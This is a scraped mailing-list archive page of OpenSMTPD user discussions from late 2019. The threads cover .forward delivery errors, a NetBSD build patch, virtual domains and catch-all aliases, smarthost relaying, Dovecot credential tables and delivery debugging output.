> drwxr-xr-x  6 suser suser   4096 Dec 18 09:07 ./
> drwxr-xr-x 51 root  root    4096 Dec 17 14:36 ../
> -rw---  1 suser suser    875 Dec 16 20:24 .bash_history
> -rw-r--r--  1 suser suser    220 Dec 10 08:46 .bash_logout
> -rw-r--r--  1 suser suser   3771 Dec 10 08:46 .bashrc
> drwx--  2 suser suser   4096 Dec 10 09:15 .cache/
> drwx--  3 suser suser   4096 Dec 10 09:15 .gnupg/
> -rw-r--r--  1 suser suser    807 Dec 10 08:46 .profile
> -rw-r--r--  1 suser suser      0 Dec 10 09:25 .sudo_as_admin_successful
> -rw---  1 root  root    1129 Dec 11 09:42 .viminfo
> drwx-- 13 suser suser   4096 Dec 18 19:42 Maildir/
> 
> От: Edgar Pettijohn 
> Отправлено: 18 декабря 2019 г. 19:28
> Кому: misc@opensmtpd.org ; Юрий Иванов 
> Тема: Re: Unable to use .forward with snmpd
>  
>
>
> On Dec 18, 2019 8:47 AM, Юрий Иванов  wrote:
> >
> > Hi, I'm using snmpd with roundcube.
> >
> > After creating .forward file I apply chmod 400 .forward, so no errors in my mail.err log.
> > Default permissions leads to generating warn in logs:
> > smtpd[6275]: warn: smtpd: /home/suser/.forward: unsecure file
> >
> > Content is more or less default:
> >
> > ad...@mydomain.com        # anything after # is ignored
> > "|/home/suser/Maildir/.admin/new/"
Probably shouldn't pipe it through a directory.
> >
> > As the result my mail is not working:
> >
> > Dec 18 12:54:33 webmail smtpd[6279]:  mda event=delivery evpid=3b98bdcf411c5f9a from= to= user=suser method=mda delay=3h48m10s result=TempFail stat=Error ("/bin/sh: 1: /home/suser/Maildir/.admin/new/: Permission denied")
> >
>
> What are the permissions for the directory you are forwarding to?
>
> > Thanks in advance
>
>
>
>



Re: Unable to use .forward with snmpd

2019-12-18 Thread Edgar Pettijohn



On 2019-12-18 17:28, Edgar Pettijohn wrote:



On Dec 18, 2019 8:47 AM, Юрий Иванов  wrote:
>
> Hi, I'm using snmpd with roundcube.
>
> After creating .forward file I apply chmod 400 .forward, so no 
errors in my mail.err log.

> Default permissions leads to generating warn in logs:
> smtpd[6275]: warn: smtpd: /home/suser/.forward: unsecure file
>
> Content is more or less default:
>
> ad...@mydomain.com        # anything after # is ignored
> "|/home/suser/Maildir/.admin/new/"



Probably shouldn't try piping it through a directory.



>
> As the result my mail is not working:
>
> Dec 18 12:54:33 webmail smtpd[6279]:  mda 
event=delivery evpid=3b98bdcf411c5f9a from= 
to= user=suser method=mda delay=3h48m10s 
result=TempFail stat=Error ("/bin/sh: 1: 
/home/suser/Maildir/.admin/new/: Permission denied")

>

What are the permissions for the directory you are forwarding to?

> Thanks in advance





Re: Unable to use .forward with snmpd

2019-12-18 Thread Edgar Pettijohn


On 2019-12-18 18:32, GARDAIS Ionel wrote:

I see no 'new' folder under the 'Maildir/.admin' folder.
Should you create it by hand ?
--
Ionel GARDAIS
Tech'Advantage CIO - IT Team manager



Please attach your smtpd.conf




*De: *"Юрий Иванов" 
*À: *"Edgar Pettijohn" , "misc" 


*Envoyé: *Mercredi 18 Décembre 2019 18:50:30
*Objet: *RE: Unable to use .forward with snmpd

I've created directory through regular RoundCube web interface.
Base directory:
suser@webmail:~$ ll Maildir/
total 188
drwx-- 13 suser suser  4096 Dec 18 19:42 ./
drwxr-xr-x  6 suser suser  4096 Dec 18 09:07 ../
drwx--  5 suser suser  4096 Dec 18 16:37 .Drafts/
drwx--  5 suser suser  4096 Dec 18 19:41 .Sent/
...
drwx--  2 suser suser 12288 Dec 18 19:41 cur/
-rw---  1 suser suser  3311 Dec 18 19:38 dovecot-uidlist
-rw---  1 suser suser     8 Dec 17 09:42 dovecot-uidvalidity
-r--r--r--  1 suser suser     0 Dec 10 11:43 dovecot-uidvalidity.5def68bc
-rw---  1 suser suser  1608 Dec 18 19:37 dovecot.index
...
-rw---  1 suser suser   192 Dec 17 09:42 dovecot.mailbox.log
drwx--  2 suser suser  4096 Dec 18 18:01 new/
-rw---  1 suser suser    53 Dec 17 09:42 subscriptions
drwx--  2 suser suser  4096 Dec 18 18:00 tmp/

Admin dir, that was created via roundcube web interface:
suser@webmail:~$ ll Maildir/.admin/
total 32
drwx--  5 suser suser 4096 Dec 16 19:26 ./
drwx-- 13 suser suser 4096 Dec 18 19:42 ../
drwx--  2 suser suser 4096 Dec 16 19:26 cur/
-rw---  1 suser suser   51 Dec 16 19:26 dovecot-uidlist
...

suser@webmail:~$ ll Maildir/.admin/cur/
total 8
drwx-- 2 suser suser 4096 Dec 16 19:26 ./
drwx-- 5 suser suser 4096 Dec 16 19:26 ../

Normal home directory:
suser@webmail:~$ ll
total 256
drwxr-xr-x  6 suser suser   4096 Dec 18 09:07 ./
drwxr-xr-x 51 root  root    4096 Dec 17 14:36 ../
-rw---  1 suser suser    875 Dec 16 20:24 .bash_history
-rw-r--r--  1 suser suser    220 Dec 10 08:46 .bash_logout
-rw-r--r--  1 suser suser   3771 Dec 10 08:46 .bashrc
drwx--  2 suser suser   4096 Dec 10 09:15 .cache/
drwx--  3 suser suser   4096 Dec 10 09:15 .gnupg/
-rw-r--r--  1 suser suser    807 Dec 10 08:46 .profile
-rw-r--r--  1 suser suser      0 Dec 10 09:25 .sudo_as_admin_successful
-rw---  1 root  root    1129 Dec 11 09:42 .viminfo
drwx-- 13 suser suser   4096 Dec 18 19:42 Maildir/
----
*От:* Edgar Pettijohn 
*Отправлено:* 18 декабря 2019 г. 19:28
*Кому:* misc@opensmtpd.org ; Юрий Иванов 


*Тема:* Re: Unable to use .forward with snmpd


On Dec 18, 2019 8:47 AM, Юрий Иванов  wrote:
>
> Hi, I'm using snmpd with roundcube.
>
> After creating .forward file I apply chmod 400 .forward, so no 
errors in my mail.err log.

> Default permissions leads to generating warn in logs:
> smtpd[6275]: warn: smtpd: /home/suser/.forward: unsecure file
>
> Content is more or less default:
>
> ad...@mydomain.com        # anything after # is ignored
> "|/home/suser/Maildir/.admin/new/"
>
> As the result my mail is not working:
>
> Dec 18 12:54:33 webmail smtpd[6279]:  mda 
event=delivery evpid=3b98bdcf411c5f9a from= 
to= user=suser method=mda delay=3h48m10s 
result=TempFail stat=Error ("/bin/sh: 1: 
/home/suser/Maildir/.admin/new/: Permission denied")

>

What are the permissions for the directory you are forwarding to?

> Thanks in advance






Re: Unable to use .forward with snmpd

2019-12-18 Thread Edgar Pettijohn

On Dec 18, 2019 8:47 AM, Юрий Иванов  wrote:
>
> Hi, I'm using snmpd with roundcube.
>
> After creating .forward file I apply chmod 400 .forward, so no errors in my mail.err log.
> Default permissions leads to generating warn in logs:
> smtpd[6275]: warn: smtpd: /home/suser/.forward: unsecure file
>
> Content is more or less default:
>
> ad...@mydomain.com        # anything after # is ignored
> "|/home/suser/Maildir/.admin/new/"
>
> As the result my mail is not working:
>
> Dec 18 12:54:33 webmail smtpd[6279]:  mda event=delivery evpid=3b98bdcf411c5f9a from= to= user=suser method=mda delay=3h48m10s result=TempFail stat=Error ("/bin/sh: 1: /home/suser/Maildir/.admin/new/: Permission denied")
>
What are the permissions for the directory you are forwarding to?
> Thanks in advance



Re: fix build on netbsd

2019-12-05 Thread Edgar Pettijohn

On Dec 5, 2019 1:06 AM, Gilles Chehade  wrote:
>
> On Wed, Dec 04, 2019 at 07:27:07PM -0600, Edgar Pettijohn wrote:
> > diff --git a/openbsd-compat/openbsd-compat.h
> > b/openbsd-compat/openbsd-compat.h
> > index 6c73e5b5..c7af0135 100644
> > --- a/openbsd-compat/openbsd-compat.h
> > +++ b/openbsd-compat/openbsd-compat.h
> > @@ -122,7 +122,7 @@ int getpeereid(int , uid_t *, gid_t *);
> > ??unsigned int arc4random(void);
> > ??#endif
> > 
> > -#if defined(HAVE_ARC4RANDOM_STIR)
> > +#if !defined(HAVE_ARC4RANDOM_STIR)
> > ??void arc4random_stir(void);
> > ??#elif defined(HAVE_ARC4RANDOM) || defined(LIBRESSL_VERSION_NUMBER)
> > ??/* Recent system/libressl implementation; no need for explicit stir */
> > 
>
> with this, your build is fixed ?
>
> I've been fixing the .c part of openbsd-compat but haven't worked on the
> .h part yet, will have  look at it
>

Yes. Restarted from configure through make install and no problems.

>
>
> -- 
> Gilles Chehade    @poolpOrg
>
> https://www.poolp.org    patreon: https://www.patreon.com/gilles
>


fix build on netbsd

2019-12-04 Thread Edgar Pettijohn
diff --git a/openbsd-compat/openbsd-compat.h 
b/openbsd-compat/openbsd-compat.h

index 6c73e5b5..c7af0135 100644
--- a/openbsd-compat/openbsd-compat.h
+++ b/openbsd-compat/openbsd-compat.h
@@ -122,7 +122,7 @@ int getpeereid(int , uid_t *, gid_t *);
 unsigned int arc4random(void);
 #endif

-#if defined(HAVE_ARC4RANDOM_STIR)
+#if !defined(HAVE_ARC4RANDOM_STIR)
 void arc4random_stir(void);
 #elif defined(HAVE_ARC4RANDOM) || defined(LIBRESSL_VERSION_NUMBER)
 /* Recent system/libressl implementation; no need for explicit stir */




Re: Primary Domains vs. Virtual Domains - what's the difference?

2019-11-18 Thread Edgar Pettijohn

On Nov 18, 2019 9:14 AM, Charles Collicutt  wrote:
>
> On 18 Nov 2019, at 13:07, gil...@poolp.org wrote:
> > 
> > With a virtual domain, OpenSMTPD assumes that domain.org == the content of 
> > the virtual table.
> > The virtual mechanism is not optional, the recipient MUST exist in the 
> > table to be valid.
>
> Can virtual users be used with sub-addresses, e.g user+...@virtualdomain.org ?
>

They should work out of the box. Just sent one to myself to double check and it 
went through.

Edgar

> When I tried that (some time ago) it failed saying that the user did not 
> exist.
>
> — 
> Charles
>


Re: Accept mail for all recipients

2019-10-30 Thread Edgar Pettijohn

On Oct 30, 2019 12:02 PM, Sergey Seacher  wrote:
>
> 26.10.2019 19:06, Sergey Seacher пишет:
>
> 26.10.2019 13:51, Reio Remma пишет:
>
> On 26/10/2019 13:35, Sergey Seacher wrote:
>
> Hello!
>
> How can I make, opensmtpd accept mail for all recipients: that are present in the file /etc/opensmtpd/aliases and that are not present?
> I had the rule in my /etc/opensmtpd/smtpd.conf file:
>>
>> accept \
>>    from any \
>>    for domain domain.ltd alias  \
>>    deliver to lmtp "/run/dovecot/lmtp" rcpt-to
>
> I have changed this rule to:
>>
>> accept \
>>    from any \
>>    for domain domain.ltd \
>>    deliver to lmtp "/run/dovecot/lmtp" rcpt-to
>
> Now, if I send to any recipient in my domain, for example rggg...@domain.ltd, I receive error 550, but I need mail to be deliver to i...@domain.ltd 
> Do you mean a catch all alias? Try adding to your aliases file:
>
> @domain.ltd i...@domain.ltd
>
> And re-add alias  to your accept rule.
>
> Thanks! Also I have changed table aliases to table vusers. It works.
> Not working again.
> The contents of the file /etc/opensmtpd/aliases:
>>
>> info              smtpd
>> @domain.ltd    i...@domain.ltd
>
> Rule in the file /etc/opensmtpd/smtpd.conf:
>>
>> accept \
>>    from any \
>>    for domain domain.ltd alias  \
>>    deliver to lmtp "/run/dovecot/lmtp" rcpt-to
>
> I sended an email to rggg...@domain.ltd and I got an error in log:
>>
>> ac73a7d6da66117e smtp event=connected address=209.85.208.173 host=mail-lj1-f173.google.com
>> ac73a7d6da66117e smtp event=failed-command address=209.85.208.173 host=mail-lj1-f173.google.com command="RCPT TO:" result="550 Invalid recipient"
>> ac73a7d6da66117e smtp event=closed address=209.85.208.173 host=mail-lj1-f173.google.com reason=quit
>
> Then I renamed the file /etc/opensmtpd/aliases to /etc/opensmtpd/vusers and changed the rule to:
>>
>> accept \
>>    from any \
>>    for domain domain.ltd virtual  \
>>    deliver to lmtp "/run/dovecot/lmtp" rcpt-to
>
> And now I get an error:
>>
>> e85fb8ffeed306b1 smtp event=connected address=209.85.167.50 host=mail-lf1-f50.google.com
>> e85fb8ffeed306b1 smtp event=message address=209.85.167.50 host=mail-lf1-f50.google.com msgid=7d1551d1 from= to= size=2904 ndest=1 proto=ESMTP
>> e85fb8ffeed306b1 smtp event=closed address=209.85.167.50 host=mail-lf1-f50.google.com reason=quit
>>  mda event=delivery evpid=7d1551d1e9537f74 from= to= rcpt=, user=smtpd method=lmtp delay=0s result=TempFail stat=Error ("RCPT TO rejected: 550 5.1.1  User doesn't exist: smtpd")
>
$ grep smtpd /etc/passwd
Edgar
> -- 
>
> Sergey


Re: Docker build is failing

2019-10-10 Thread Edgar Pettijohn
Kinda curious what the config.h looks like after you run configure.
On Oct 10, 2019 2:04 PM, Ihor Antonov  wrote:
>
> On Thu, 2019-10-10 at 14:46 -0400, Ihor Antonov wrote:
> > Docker build of portable branch is broken, and has been for a while
> > now. I discovered this while trying to test out Gilles' rspamd
> > plugin,
> > which requires latest 6.6 version
> > 
> > I am not a C developer, but from the error it a bit of googling it
> > looks like stuff from openbsd-compat/ is conflicting with some system
> > libraries. 
> > 
> > I did some bisecting and last good commit (in regards of Dockerfile
> > ) 
> > which was a while ago.
> > 
> > > Commit 9f6b7cc1b14624f919a6a9d7ac5a2ded002b2707
> > > Author: Arthur Moore 
> > > Date:   Wed Feb 20 22:20:56 2019 -0500
> > > 
> > >    Add an automated test to check if TLS certificates work
> > > 
> > >    This should allow Docker Hub to act as a CI platform.
> > 
> > Github Actions CI seems to be working fine, but it uses ubuntu, not
> > alpine.  I am happy to help fix/troubleshoot this but I
> > need  guidance
> > from someone who knows C. I am also interested in building it for
> > Alpine as I need this for my future work.
> > 
> > ---
> > Ihor Antonov
> > 
>
> Forgot to include the link to github issue
> https://github.com/OpenSMTPD/OpenSMTPD/issues/944
>
>


Re: Handling of mailing list (or other non system) accounts

2019-10-05 Thread Edgar Pettijohn
> > 
> > Accepting mails for user known to the system works, but what I haven't
> > though about, are mailing lists. And probably, also mails to be
> > recieved in
> > [B]CC could be affected.
> > 
> > As those are not directly adressed to any account known to the system,
> > but
> > f.e "misc@opensmtpd.org", opensmtpd rejects them with an "550 Invalid
> > recipient"

sounds like a good response to me

> > 
> > That is a problem I have currently no idea on how to deal with this.
> > 

I don't understand how not accepting mails that you have no user to accept
is a problem. 


> > Any insides?
> > 

I think you need to provide more information about what you want to happen
and what is happening.

> > Thanks again
> > 
> > Thanks Ede
>

Edgar 



Re: unable to send mail from desktop mail client to remote email addresses

2019-10-03 Thread Edgar Pettijohn
Could you post your config. 
Thanks
On Oct 3, 2019 10:34 AM, Kevin  wrote:On Thu, Oct 3, 2019 at 12:36 AM Peter N. M. Hansteen  wrote:On Wed, Oct 02, 2019 at 11:33:58PM -0700, Kevin wrote:
> Hi all,
> 
> Having just followed the setup instructions on Gilles HOWTO page here:
> 
> 
> https://poolp.org/posts/2019-09-14/setting-up-a-mail-server-with-opensmtpd-dovecot-and-rspamd/
> 
> 
> ...I'm unable to send mail from my new OpenSMTPD server on OpenBSD 6.6-beta
> (OpenBSD 6.6-beta (GENERIC) #320: Mon Sep 30 21:24:24 MDT 2019); however,
> other deliveries (and mail retrieval) work.
> 
> The pertinent log message looks like this:
> 
> Oct  2 23:21:33 mx smtpd[25067]: bf1c57bab7fcd344 smtp envelope
> evpid=2c41c5fc4a7e6c06 from= to=
> Oct  2 23:21:33 mx smtpd[25067]: bf1c57bab7fcd344 smtp disconnected
> reason=quit
> Oct  2 23:21:38 mx smtpd[25067]: bf1c57b6b057c6ef mta error
> reason=Connection timeout

Connection timeout sounds very much like your machine is not allowed to send 
outgoing mail via SMTP. Check for firewalls and the like.

Also,

[Thu Oct 03 09:24:37] peter@skapet:~$ host example.app
Host example.app not found: 3(NXDOMAIN)
[Thu Oct 03 09:24:43] peter@skapet:~$ host mx.example.app
Host mx.example.app not found: 3(NXDOMAIN)

Among the things you need in order to deliver mail, a valid domain is in 
the top few. I think the basic requirements are indeed listed in the article
(under "Requirements"), please go back and re-read, check that you have
all of those set up properly.I can see why you might think that given that I altered the real domain name to example.app. (I know it's frowned upon; I only did it because this is a new machine with a setup hobbling along. Bad Kevin... bad...)In any event, I'm *sure* the domain DNS part is right as I can _receive_ email just fine, including from the same @gmail address I'm writing this from, ergo, DNS resolution of the real domain (and its MX record) are fine. As for pf being the issue; it's disabled.# pfctl -s infoStatus: Disabled for 0 days 08:23:56             Debug: errLatest, greatest kernel running:$ dmesg | grep Open | tail -1    OpenBSD 6.6 (GENERIC) #326: Wed Oct  2 22:34:33 MDT 2019 One of the things that's puzzling is this part of the log:smtp disconnected reason=quit.If I can send the domain email, if I can retrieve email via Dovecot, if I can send mail to myself from the server's CLI (and even retrieve it remotely via my mail client), it seems like there's some knob missing that says, "All auth'd users to relay," yet, I've copied-and-pasted Gilles' rules (and edited them for my own domain) , and it am no workie.Is there perhaps something else akin to the forwarding knob that lets PF forward packets between interfaces that either I've forgotten or was skipped in the HOWTO?Thanks,Kevin


Re: need help

2019-09-30 Thread Edgar Pettijohn

On Sep 30, 2019 9:10 AM, Reio Remma  wrote:
>
> On 30/09/2019 16:55, gil...@poolp.org wrote:
> > Hello,
> >
> > I'd like to bring native support for SPF in OpenSMTPD in a future release,
> > but for this I need a bit of help to make sure my SPF resolver works fine.
> >
> > I have created a repository with a standalone executable that performs the
> > SPF lookup and checks if an IP address is allowed to send on behalf of the
> > sending domain:
> >
> > https://github.com/poolpOrg/spf
> >
> > https://github.com/poolpOrg/spf/blob/master/README.md
> >
> >
> > If you could test and report issues, it would be nice,
> >
>
> Is it OpenBSD only atm?
>
> On CentOS 7:
>
> $ make
> Makefile:26: *** missing separator.  Stop.
>
> Reio
>
>

Looking at the makefile. My guess is yes, but you could try bmake and see if it 
gets further.

Edgar

Re: Senders based relaying & authentication

2019-09-26 Thread Edgar Pettijohn
It's the first example in smtpd.conf(5).

Edgar
On Sep 26, 2019 8:43 AM, john philip  wrote:
>
> Hello everybody.
> I'm new to the list :-)
>
> Postfix has senders-dependent routing and authentication.
>
> How to do senders-based relaying & authentication as Postfix
> to different smart hosts?
>
> On a laptop, for example:
>
> us...@isp1.com => smtp.isp1.com:465
> us...@isp1.com => smtp.isp1.com:465
>
> us...@isp2.com => smtp.isp2.com:587
> us...@isp3.com => smtp.isp3.com:465
> ..
>
> Thanks in advence.
>
> -- 
> john
>


Re: table-passwd

2019-09-23 Thread Edgar Pettijohn

On Sep 23, 2019 11:58 AM, Joerg Jung  wrote:
>
>
>
> > On 18. Sep 2019, at 09:38, gil...@poolp.org wrote:
> > 
> > September 17, 2019 11:41 PM, "Edgar Pettijohn"  
> > wrote:
> > 
> >> On Sep 17, 2019 9:05 AM, Gilles Chehade  wrote:
> >> 
> >>> Hello,
> >>> 
> >>> Is there anyone using table-passwd for _any_ other purposes than sharing
> >>> with Dovecot ?
> >>> 
> >>> I have built a fully virtual setup which shares credentials with Dovecot
> >>> and since I managed to do it _without_ table-passwd I'm wondering if the
> >>> table backend is really useful and if it was not created because soneone
> >>> had overlooked the first few lines of the Dovecot documentation stating:
> >>> 
> >>> "For a password database, it's enough to have only the user and password
> >>> fields."
> >>> 
> >> 
> >> Not actually using it, but for dovecot to use it as a userdb as well as a 
> >> passdb it needs the
> >> additional fields.
> >> 
> > 
> > ok so I'm misunderstanding the use-case, let me explain why I'm curious:
> > 
> > I wrote table-passwd because I was told that if you wanted to create a 
> > virtual setup,
> > backed by one single user, you needed to have a passwd(5)-format file for 
> > Dovecot and
> > share that with OpenSMTPD.
> > 
> > But then I did a fully virtual setup for myself and I didn't use 
> > table-passwd, so the
> > rationale behind it falls a bit apart for me, unless there's other 
> > use-cases.
> > 
> > On my setup, file /etc/mail/accounts is a simple two columns 
> > username/password table:
> > 
> > # head -1 /etc/mail/accounts.txt 
> > gil...@poolp.org:$2b$09$0ek9ozmo1u0mSsiRo/z2AumROLK.70T9A6bP3mFDqb38L0sC5RvT6
> > #
> > 
> [...]
> > 
> > This allows both OpenSMTPD and Dovecot to authenticate accounts that are 
> > not system
> > users, allows OpenSMTPD to drop mail to a maildir owned by system account 
> > in charge
> > of virtual accounts and allows Dovecot to properly serve these accounts.
> > 
> > Am I missing your use-cases here ?
> > 
>
> Yes, this is perfectly fine for simpler cases, but as someone else 
> mentioned in this thread earlier already:
> Dovecot passdb knows about additional fields, in particular 
> to specify user specific quotas (usually rather important in 
> virtual user setups). table-passwd can handle/ignore these 
> extra_fields correctly. So my passwd file lines looks like this:
> f...@bar.de:$2b$::userdb_quota_rule=*:storage=10G
>
>
>

I'm guessing you are looking for fat to trim. Personally I like it as is. Just 
my two cents.

Edgar

Re: table-passwd

2019-09-17 Thread Edgar Pettijohn

On Sep 17, 2019 9:05 AM, Gilles Chehade  wrote:
>
> Hello,
>
> Is there anyone using table-passwd for _any_ other purposes than sharing
> with Dovecot ?
>
> I have built a fully virtual setup which shares credentials with Dovecot
> and since I managed to do it _without_ table-passwd I'm wondering if the
> table backend is really useful and if it was not created because soneone
> had overlooked the first few lines of the Dovecot documentation stating:
>
> "For a password database, it's enough to have only the user and password
> fields."
>
> -- 
> Gilles Chehade    @poolpOrg
>
> https://www.poolp.org    patreon: https://www.patreon.com/gilles
>

Not actually using it, but for dovecot to use it as a userdb as well as a 
passdb it needs the additional fields.

Edgar

Re: smarthost + aliases

2019-09-13 Thread Edgar Pettijohn
On Sat, Sep 14, 2019 at 12:32:22AM +0200, Thomas Schweikle wrote:
> Hi!
> 
> Trying to set up opensmtpd as a simple single mta relaying all mail to a
> smarthost. But ...
> 
> Config:
> listen on localhost
> table aliases db:/etc/aliases.db
> table secrets db:/etc/smtpd.secrets.db
> expire 4h


Add:

accept for local alias  deliver to mbox
accept from local for any relay via smtps+auth://gm...@smtp.gmail.com:465 auth



> 
> aliases hold:
> root: @gmail.com
> 
> now: aliases are not used. If I change??
> accept from local for any relay via smtps+auth://gm...@smtp.gmail.com:465 auth
> 
> 
> to
> 
> accept from local for any alias  relay via smtps+auth://
> gm...@smtp.gmail.com:465 auth 
> 
> "smtpd -n"??exhausts:
> /etc/smtpd.conf:18: aliases/virtual may not be used with a relay rule
> warn: no rules, nothing to do
> 
> what i want is:
> - accept mail from local,
> - apply alias expansion so "root" -> "??@ maildomain"
> - relay the whole thing.
> 
> at the smarthost this shall look like:
> From: root??@ servername
> To: ??@ maildomain
> 
> any idea how to make it happen??with opensmtpd?
> There are lots of examples to find within the www, but non with relaying. All
> with local delivery. But I like to relay and expand aliases before!
> 
> --
> Thomas



Re: My smtp server can't send emails to another ones (550 Invalid recipient)

2019-09-13 Thread Edgar Pettijohn
On Fri, Sep 13, 2019 at 08:04:12PM -0300, marcio_silva wrote:
> Hi all,
> 
> I am using Hyperbola distro with the following packages:
> 
> * opensmtpd 6.4.2p1
> * dkimproxy 1.4.1
> 
> I have installed a mail server to send and receive emails with my own domain
> with the following configurations:
> 
> * "smtp.libreware.info" as server
> * "libreware.info" as email address
> * "dusseldorf.libreware.info" as PTR in IPv4
> * "smtp.libreware.info" as PTR in IPv6
> 
> Features that works well:
> 
> * Accessing to port 587 SMTP+TLS
> * Receiving from itself and from another smtp servers around internet (eg.
> riseup.net emails)
> * Sending emails to itself and another @libreware.info users
> 
> Issues:
> 
> * Port 25 to send emails has not been tested
> * Localhost network has not been tested
> * Accessing to port 465 (SMTPS) is not working
> * Sending email to another smtp servers (eg. f...@libreware.info ->
> b...@example.com) is not working by generating 550 error (550 Invalid
> recipient)
> 
> 
> 
> smtpd.conf:
> 
> ## This is the smtpd server system-wide configuration file.
> ## See smtpd.conf(5), aliases(5) and table(5) for more information.
> 
> ca smtp.libreware.info cert
> '/etc/letsencrypt/archive/libreware.info/chain1.pem'
> 
> bounce warn-interval  '4h'
> 
> mta max-deferred  100
> 
> pki smtp.libreware.info cert
> '/etc/letsencrypt/archive/libreware.info/fullchain1.pem'
> pki smtp.libreware.info dhe   auto
> pki smtp.libreware.info key
> '/etc/letsencrypt/archive/libreware.info/privkey1.pem'
> 
> queue compression
> queue ttl '4d'
> 
> smtp ciphers  
> 'HIGH:AES128:!aNULL:!kDH:!kPSK:!NULL:!kRSA:!kRSAPSK:SHA:SHA256:SHA384:!TLSv1'
> smtp max-message-size '35M'
> smtp sub-addr-delim   '+'
> 
> table aliases '/etc/smtpd/tables.d/aliases.conf'
> table credentials '/etc/smtpd/tables.d/credentials.conf'
> table domains '/etc/smtpd/tables.d/domains.conf'
> table hostnames_inet  '/etc/smtpd/tables.d/hostnames.conf'
> table virtuals'/etc/smtpd/tables.d/virtuals.conf'
> 
> 
> 
> action deliver_to_inetmaildir 
> '/var/mail/%{user.username}/inbox'  \
>   alias   
> action deliver_to_local   maildir 
> '/var/mail/%{user.username}/inbox'  \
>   virtual 
> action relay_to_inet_smtp relay
>   helo-src
> action relay_to_inet_subm relay   
> \
>   helo-src
> \
>   host
> smtp+tls://la...@smtp.libreware.info:25 \
>   auth
> action relay_to_inet_submsrelay   
> \
>   helo-src
> \
>   host
> smtp+tls://la...@smtp.libreware.info:25 \
>   auth
> action relay_to_local relay
> 
> listen on lo  port   24   \
>   tag lmtp_local
> listen on eth0auth-optional  
> \
>   ca  smtp.libreware.info \
>   hostnames   \
>   mask-src\
>   pki smtp.libreware.info \
>   port   25   \
>   tag smtp_server_starttls\
>   tls-require
> listen on eth0auth   
> \
>   ca  smtp.libreware.info \
>   hostnames   \
>   mask-src\
>   pki smtp.libreware.info \
>   port  465   \
>   smtps   \
>   tag smtps_submission
> listen on eth0auth   
> \
>   ca  smtp.libreware.info \
>   hostnames   \
>   mask-src\
>   pki smtp.libreware.info \
>   port  587   \
>   tag smtp_submission_starttls\
>   

Re: Virtual User handling

2019-09-07 Thread Edgar Pettijohn
On Sat, Sep 07, 2019 at 11:53:58AM +0200, Ede Wolf wrote:
> > > So it is a binary, thats useful information. Having specified /opt/smtpd
> > > as prefix during ./configure, it is located here:
> > > 
> > > /opt/smptd/libexec/opensmtpd/mail.lmtp
> > > 
> > 
> > Throw it in /usr/local/libexec/smtpd/ and see what happens. May be a build 
> > tools bug.
> > 
> 
> Excellent idea, however, the error stays the same. No change, despite
> copying the whole opensmtpd folder to /usr/local/libexec
> 
> 
> Even strace does not reveal the path it is looking for:
> 
> 
> expand: 0x56284c3f4338: expand_insert() called for
> address:m...@example.com[parent=(nil), rule=(nil)]
> expand: 0x56284c3f4338: inserted node 0x56284c3f6030
> expand: lka_expand: address: m...@example.com [depth=0]
> lookup: match "37.120.186.114" as NETADDR in table static: -> true
> lookup: match "example.com" as DOMAIN in table static: -> true
> rule #1 matched: match from any for domain  action deliver
> lookup: lookup "m...@example.com" as ALIAS in table static:vusers -> none
> lookup: lookup "mary" as ALIAS in table static:vusers -> none
> lookup: lookup "@example.com" as ALIAS in table static:vusers -> none
> lookup: lookup "@" as ALIAS in table static:vusers -> "lmtpd"
> expand: 0x56284c3f3b10: expand_insert() called for
> username:lmtpd[parent=(nil), rule=(nil)]
> expand: 0x56284c3f3b10: inserted node 0x56284c3f6590
> expand: 0x56284c3f4338: expand_insert() called for
> username:lmtpd[parent=0x56284c3f6030, rule=0x56284c403e50,
> dispatcher=0x56284c405750]
> expand: 0x56284c3f4338: inserted node 0x56284c3f6af0
> expand: 0x56284c3f3b10: clearing expand tree
> expand: 0x56284c3f3b10: freeing expand tree
> debug: aliases_virtual_get: '@example.com' resolved to 1 nodes
> expand: lka_expand: username: lmtpd [depth=1, sameuser=0]
> lookup: lookup "lmtpd@" as ALIAS in table static:vusers -> none
> lookup: lookup "lmtpd" as ALIAS in table static:vusers -> none
> lookup: lookup "@" as ALIAS in table static:vusers -> "lmtpd"
> expand: 0x56284c3ed110: expand_insert() called for
> username:lmtpd[parent=(nil), rule=(nil)]
> expand: 0x56284c3ed110: inserted node 0x56284c3f6590
> expand: 0x56284c3f4338: expand_insert() called for
> username:lmtpd[parent=0x56284c3f6af0, rule=0x56284c403e50,
> dispatcher=0x56284c405750]
> expand: 0x56284c3f4338: setting sameuser = 1
> expand: 0x56284c3f4338: inserted node 0x56284c3f7050
> expand: 0x56284c3ed110: clearing expand tree
> expand: 0x56284c3ed110: freeing expand tree
> debug: aliases_virtual_get: '@' resolved to 1 nodes
> expand: lka_expand: username: lmtpd [depth=2, sameuser=1]
> lookup: lookup "lmtpd" as USERINFO in table getpwnam: ->
> "115:115:/opt/smptd/var/lmtpd"
> [{EPOLLIN, {u32=6, u64=6}}], 32, -1) = 1
> epoll_ctl(3, EPOLL_CTL_DEL, 6, 0x7ffeb16e607c) = 0
> socket(AF_INET, SOCK_DGRAM, IPPROTO_IP) = 12
> socket(AF_INET, SOCK_DGRAM, IPPROTO_IP) = 13
> close(12)   = 0
> close(13)   = 0
> recvmsg(6, {msg_name=NULL, msg_namelen=0, 
> msg_iov=[{iov_base="4\0\0\0(\21\0\0\0\0\0\0\237\25\0\0[\300\213\3725\333\374!\0lmtpd\0\0"...,
> iov_len=65535}], msg_iovlen=1, msg_controllen=0, msg_flags=0}, 0) = 4392
> stat("/opt/smptd/var/lmtpd", {st_mode=S_IFDIR
> openat(AT_FDCWD, "/opt/smptd/var/lmtpd/.forward", O_RDONLY
> epoll_ctl(3, EPOLL_CTL_ADD, 6, {EPOLLIN
> epoll_ctl(3, EPOLL_CTL_DEL, 6, 0x7ffeb16e5fdc) = 0
> epoll_ctl(3, EPOLL_CTL_ADD, 6, {EPOLLIN
> epoll_wait(3, [{EPOLLOUT, {u32=6, u64=6}}], 32, -1) = 1
> epoll_ctl(3, EPOLL_CTL_DEL, 6, 0x7ffeb16e607c) = 0
> sendmsg(6, {msg_name=NULL, msg_namelen=0, 
> msg_iov=[{iov_base="4\0\0\0(\21\0\0\0\0\0\0\234\25\0\0[\300\213\3725\333\374!\1lmtpd\0\0"...,
> iov_len=4392}], msg_iovlen=1, msg_controllen=0, msg_flags=0}, 0) = 4392
> epoll_ctl(3, EPOLL_CTL_ADD, 6, {EPOLLIN, {u32=6, u64=6}}expand: no forward
> for user lmtpd, just deliver
> ) = 0
> epoll_wait(3, expand: 0x56284c3f4338: clearing expand tree
> smtp: 0x564267537b60: fd 14 from queue
